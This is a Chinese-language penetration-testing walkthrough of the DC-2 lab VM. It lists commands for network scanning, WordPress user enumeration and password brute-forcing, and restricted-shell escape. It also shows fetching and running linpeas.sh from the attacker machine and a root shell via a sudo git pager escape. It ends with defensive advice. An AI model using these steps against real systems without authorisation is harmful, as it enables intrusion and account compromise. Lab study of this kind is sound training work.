DC-2 靶机渗透测试教学文档

环境信息

• 攻击机IP: 192.168.44.128
• 靶机IP: 192.168.44.132

信息收集阶段

1. 主机发现

使用以下命令确定靶机IP:

nmap -sn 192.168.44.0/24
# 或
arp-scan -I eth0 -l

2. 端口扫描

使用nmap进行端口扫描:

nmap -sV -p- 192.168.44.132

Web应用渗透

1. 网站访问配置

• 靶机需要使用dc-2域名访问
• 修改攻击机hosts文件:

echo "192.168.44.132 dc-2" >> /etc/hosts

2. WordPress站点分析

• 访问http://dc-2发现是WordPress博客
• 找到flag1.txt并阅读提示

3. 密码字典生成

使用cewl工具爬取网站内容生成字典:

cewl http://dc-2/ -w dic.txt

4. WordPress用户枚举

使用wpscan枚举用户:

wpscan --url http://dc-2/ -e u

发现三个用户: admin, tom, jerry

5. 密码爆破

使用生成的字典爆破密码:

wpscan --url http://dc-2/ -U tom,jerry -P dic.txt

获取到tom和jerry的密码

系统渗透

1. SSH登录尝试

• 使用获取的凭据尝试SSH登录
• tom用户SSH登录成功
• jerry用户无法SSH登录

2. 获取flag3

• 登录后发现flag3.txt
• 使用以下命令读取(常规cat被禁用):

/bin/cat flag3.txt
# 或
export PATH=$PATH:.
# 然后
cat flag3.txt

3. 切换用户

根据flag3提示切换到jerry用户:

su jerry
# 输入jerry的密码

获取flag4.txt

权限提升

1. 漏洞扫描

• 在攻击机启动HTTP服务:

python2 -m SimpleHTTPServer 80

• 在靶机下载并执行linpeas.sh:

wget http://192.168.44.128/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

2. Git提权

发现git有SUID权限，可利用:

sudo git -p --help
# 在帮助界面输入
!/bin/bash

获取root权限，读取最终flag

关键知识点总结

1. 主机发现与端口扫描: 使用nmap和arp-scan进行网络探测

2. WordPress安全:

   • 用户枚举技术
   • 使用cewl生成针对性字典
   • 密码爆破技巧

3. 受限环境绕过:

   • 当常用命令被限制时的替代方法
   • 环境变量修改技巧

4. 权限提升方法:

   • SUID权限滥用
   • Git提权技术
   • 自动化工具(linpeas)的使用

5. 横向移动:

   • 凭据重用
   • 用户切换技巧

防御建议

1. 限制WordPress用户枚举
2. 使用强密码策略
3. 定期检查SUID权限文件
4. 最小权限原则
5. 禁用不必要的服务(如SSH)